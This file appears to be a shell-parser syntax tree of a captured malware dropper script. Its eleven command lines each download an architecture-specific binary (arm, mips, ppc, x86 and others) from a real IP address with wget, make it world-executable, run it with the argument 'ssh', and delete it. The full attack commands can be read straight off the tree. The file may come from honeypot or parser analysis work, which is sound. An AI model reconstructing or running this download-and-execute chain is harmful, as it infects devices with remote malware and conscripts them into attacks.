ListNode(lineno=2, pos=(12, 93), parts=[
  CommandNode(lineno=2, pos=(12, 48), parts=[
    WordNode(lineno=2, pos=(12, 16), word='wget'),
    WordNode(lineno=2, pos=(17, 48), word='http://212.237.34.150/s-ket.arm'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(48, 49)),
  CommandNode(lineno=2, pos=(50, 61), parts=[
    WordNode(lineno=2, pos=(50, 55), word='chmod'),
    WordNode(lineno=2, pos=(56, 59), word='777'),
    WordNode(lineno=2, pos=(60, 61), word='*'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(61, 62)),
  CommandNode(lineno=2, pos=(62, 77), parts=[
    WordNode(lineno=2, pos=(62, 73), word='./s-ket.arm'),
    WordNode(lineno=2, pos=(74, 77), word='ssh'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(77, 78)),
  CommandNode(lineno=2, pos=(79, 93), parts=[
    WordNode(lineno=2, pos=(79, 81), word='rm'),
    WordNode(lineno=2, pos=(82, 85), word='-rf'),
    WordNode(lineno=2, pos=(86, 93), word='s-ket.*'),
  ]),
])
ListNode(lineno=3, pos=(94, 177), parts=[
  CommandNode(lineno=3, pos=(94, 131), parts=[
    WordNode(lineno=3, pos=(94, 98), word='wget'),
    WordNode(lineno=3, pos=(99, 131), word='http://212.237.34.150/s-ket.arm5'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(131, 132)),
  CommandNode(lineno=3, pos=(133, 144), parts=[
    WordNode(lineno=3, pos=(133, 138), word='chmod'),
    WordNode(lineno=3, pos=(139, 142), word='777'),
    WordNode(lineno=3, pos=(143, 144), word='*'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(144, 145)),
  CommandNode(lineno=3, pos=(145, 161), parts=[
    WordNode(lineno=3, pos=(145, 157), word='./s-ket.arm5'),
    WordNode(lineno=3, pos=(158, 161), word='ssh'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(161, 162)),
  CommandNode(lineno=3, pos=(163, 177), parts=[
    WordNode(lineno=3, pos=(163, 165), word='rm'),
    WordNode(lineno=3, pos=(166, 169), word='-rf'),
    WordNode(lineno=3, pos=(170, 177), word='s-ket.*'),
  ]),
])
ListNode(lineno=4, pos=(178, 261), parts=[
  CommandNode(lineno=4, pos=(178, 215), parts=[
    WordNode(lineno=4, pos=(178, 182), word='wget'),
    WordNode(lineno=4, pos=(183, 215), word='http://212.237.34.150/s-ket.arm6'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(215, 216)),
  CommandNode(lineno=4, pos=(217, 228), parts=[
    WordNode(lineno=4, pos=(217, 222), word='chmod'),
    WordNode(lineno=4, pos=(223, 226), word='777'),
    WordNode(lineno=4, pos=(227, 228), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(228, 229)),
  CommandNode(lineno=4, pos=(229, 245), parts=[
    WordNode(lineno=4, pos=(229, 241), word='./s-ket.arm6'),
    WordNode(lineno=4, pos=(242, 245), word='ssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(245, 246)),
  CommandNode(lineno=4, pos=(247, 261), parts=[
    WordNode(lineno=4, pos=(247, 249), word='rm'),
    WordNode(lineno=4, pos=(250, 253), word='-rf'),
    WordNode(lineno=4, pos=(254, 261), word='s-ket.*'),
  ]),
])
ListNode(lineno=5, pos=(262, 345), parts=[
  CommandNode(lineno=5, pos=(262, 299), parts=[
    WordNode(lineno=5, pos=(262, 266), word='wget'),
    WordNode(lineno=5, pos=(267, 299), word='http://212.237.34.150/s-ket.arm7'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(299, 300)),
  CommandNode(lineno=5, pos=(301, 312), parts=[
    WordNode(lineno=5, pos=(301, 306), word='chmod'),
    WordNode(lineno=5, pos=(307, 310), word='777'),
    WordNode(lineno=5, pos=(311, 312), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(312, 313)),
  CommandNode(lineno=5, pos=(313, 329), parts=[
    WordNode(lineno=5, pos=(313, 325), word='./s-ket.arm7'),
    WordNode(lineno=5, pos=(326, 329), word='ssh'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(329, 330)),
  CommandNode(lineno=5, pos=(331, 345), parts=[
    WordNode(lineno=5, pos=(331, 333), word='rm'),
    WordNode(lineno=5, pos=(334, 337), word='-rf'),
    WordNode(lineno=5, pos=(338, 345), word='s-ket.*'),
  ]),
])
ListNode(lineno=6, pos=(346, 429), parts=[
  CommandNode(lineno=6, pos=(346, 383), parts=[
    WordNode(lineno=6, pos=(346, 350), word='wget'),
    WordNode(lineno=6, pos=(351, 383), word='http://212.237.34.150/s-ket.m68k'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(383, 384)),
  CommandNode(lineno=6, pos=(385, 396), parts=[
    WordNode(lineno=6, pos=(385, 390), word='chmod'),
    WordNode(lineno=6, pos=(391, 394), word='777'),
    WordNode(lineno=6, pos=(395, 396), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(396, 397)),
  CommandNode(lineno=6, pos=(397, 413), parts=[
    WordNode(lineno=6, pos=(397, 409), word='./s-ket.m68k'),
    WordNode(lineno=6, pos=(410, 413), word='ssh'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(413, 414)),
  CommandNode(lineno=6, pos=(415, 429), parts=[
    WordNode(lineno=6, pos=(415, 417), word='rm'),
    WordNode(lineno=6, pos=(418, 421), word='-rf'),
    WordNode(lineno=6, pos=(422, 429), word='s-ket.*'),
  ]),
])
ListNode(lineno=7, pos=(430, 513), parts=[
  CommandNode(lineno=7, pos=(430, 467), parts=[
    WordNode(lineno=7, pos=(430, 434), word='wget'),
    WordNode(lineno=7, pos=(435, 467), word='http://212.237.34.150/s-ket.mips'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(467, 468)),
  CommandNode(lineno=7, pos=(469, 480), parts=[
    WordNode(lineno=7, pos=(469, 474), word='chmod'),
    WordNode(lineno=7, pos=(475, 478), word='777'),
    WordNode(lineno=7, pos=(479, 480), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(480, 481)),
  CommandNode(lineno=7, pos=(481, 497), parts=[
    WordNode(lineno=7, pos=(481, 493), word='./s-ket.mips'),
    WordNode(lineno=7, pos=(494, 497), word='ssh'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(497, 498)),
  CommandNode(lineno=7, pos=(499, 513), parts=[
    WordNode(lineno=7, pos=(499, 501), word='rm'),
    WordNode(lineno=7, pos=(502, 505), word='-rf'),
    WordNode(lineno=7, pos=(506, 513), word='s-ket.*'),
  ]),
])
ListNode(lineno=8, pos=(514, 597), parts=[
  CommandNode(lineno=8, pos=(514, 551), parts=[
    WordNode(lineno=8, pos=(514, 518), word='wget'),
    WordNode(lineno=8, pos=(519, 551), word='http://212.237.34.150/s-ket.mpsl'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(551, 552)),
  CommandNode(lineno=8, pos=(553, 564), parts=[
    WordNode(lineno=8, pos=(553, 558), word='chmod'),
    WordNode(lineno=8, pos=(559, 562), word='777'),
    WordNode(lineno=8, pos=(563, 564), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(564, 565)),
  CommandNode(lineno=8, pos=(565, 581), parts=[
    WordNode(lineno=8, pos=(565, 577), word='./s-ket.mpsl'),
    WordNode(lineno=8, pos=(578, 581), word='ssh'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(581, 582)),
  CommandNode(lineno=8, pos=(583, 597), parts=[
    WordNode(lineno=8, pos=(583, 585), word='rm'),
    WordNode(lineno=8, pos=(586, 589), word='-rf'),
    WordNode(lineno=8, pos=(590, 597), word='s-ket.*'),
  ]),
])
ListNode(lineno=9, pos=(598, 679), parts=[
  CommandNode(lineno=9, pos=(598, 634), parts=[
    WordNode(lineno=9, pos=(598, 602), word='wget'),
    WordNode(lineno=9, pos=(603, 634), word='http://212.237.34.150/s-ket.ppc'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(634, 635)),
  CommandNode(lineno=9, pos=(636, 647), parts=[
    WordNode(lineno=9, pos=(636, 641), word='chmod'),
    WordNode(lineno=9, pos=(642, 645), word='777'),
    WordNode(lineno=9, pos=(646, 647), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(647, 648)),
  CommandNode(lineno=9, pos=(648, 663), parts=[
    WordNode(lineno=9, pos=(648, 659), word='./s-ket.ppc'),
    WordNode(lineno=9, pos=(660, 663), word='ssh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(663, 664)),
  CommandNode(lineno=9, pos=(665, 679), parts=[
    WordNode(lineno=9, pos=(665, 667), word='rm'),
    WordNode(lineno=9, pos=(668, 671), word='-rf'),
    WordNode(lineno=9, pos=(672, 679), word='s-ket.*'),
  ]),
])
ListNode(lineno=10, pos=(680, 761), parts=[
  CommandNode(lineno=10, pos=(680, 716), parts=[
    WordNode(lineno=10, pos=(680, 684), word='wget'),
    WordNode(lineno=10, pos=(685, 716), word='http://212.237.34.150/s-ket.sh4'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(716, 717)),
  CommandNode(lineno=10, pos=(718, 729), parts=[
    WordNode(lineno=10, pos=(718, 723), word='chmod'),
    WordNode(lineno=10, pos=(724, 727), word='777'),
    WordNode(lineno=10, pos=(728, 729), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(729, 730)),
  CommandNode(lineno=10, pos=(730, 745), parts=[
    WordNode(lineno=10, pos=(730, 741), word='./s-ket.sh4'),
    WordNode(lineno=10, pos=(742, 745), word='ssh'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(745, 746)),
  CommandNode(lineno=10, pos=(747, 761), parts=[
    WordNode(lineno=10, pos=(747, 749), word='rm'),
    WordNode(lineno=10, pos=(750, 753), word='-rf'),
    WordNode(lineno=10, pos=(754, 761), word='s-ket.*'),
  ]),
])
ListNode(lineno=11, pos=(762, 843), parts=[
  CommandNode(lineno=11, pos=(762, 798), parts=[
    WordNode(lineno=11, pos=(762, 766), word='wget'),
    WordNode(lineno=11, pos=(767, 798), word='http://212.237.34.150/s-ket.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(798, 799)),
  CommandNode(lineno=11, pos=(800, 811), parts=[
    WordNode(lineno=11, pos=(800, 805), word='chmod'),
    WordNode(lineno=11, pos=(806, 809), word='777'),
    WordNode(lineno=11, pos=(810, 811), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(811, 812)),
  CommandNode(lineno=11, pos=(812, 827), parts=[
    WordNode(lineno=11, pos=(812, 823), word='./s-ket.spc'),
    WordNode(lineno=11, pos=(824, 827), word='ssh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(827, 828)),
  CommandNode(lineno=11, pos=(829, 843), parts=[
    WordNode(lineno=11, pos=(829, 831), word='rm'),
    WordNode(lineno=11, pos=(832, 835), word='-rf'),
    WordNode(lineno=11, pos=(836, 843), word='s-ket.*'),
  ]),
])
ListNode(lineno=12, pos=(844, 925), parts=[
  CommandNode(lineno=12, pos=(844, 880), parts=[
    WordNode(lineno=12, pos=(844, 848), word='wget'),
    WordNode(lineno=12, pos=(849, 880), word='http://212.237.34.150/s-ket.x86'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(880, 881)),
  CommandNode(lineno=12, pos=(882, 893), parts=[
    WordNode(lineno=12, pos=(882, 887), word='chmod'),
    WordNode(lineno=12, pos=(888, 891), word='777'),
    WordNode(lineno=12, pos=(892, 893), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(893, 894)),
  CommandNode(lineno=12, pos=(894, 909), parts=[
    WordNode(lineno=12, pos=(894, 905), word='./s-ket.x86'),
    WordNode(lineno=12, pos=(906, 909), word='ssh'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(909, 910)),
  CommandNode(lineno=12, pos=(911, 925), parts=[
    WordNode(lineno=12, pos=(911, 913), word='rm'),
    WordNode(lineno=12, pos=(914, 917), word='-rf'),
    WordNode(lineno=12, pos=(918, 925), word='s-ket.*'),
  ]),
])
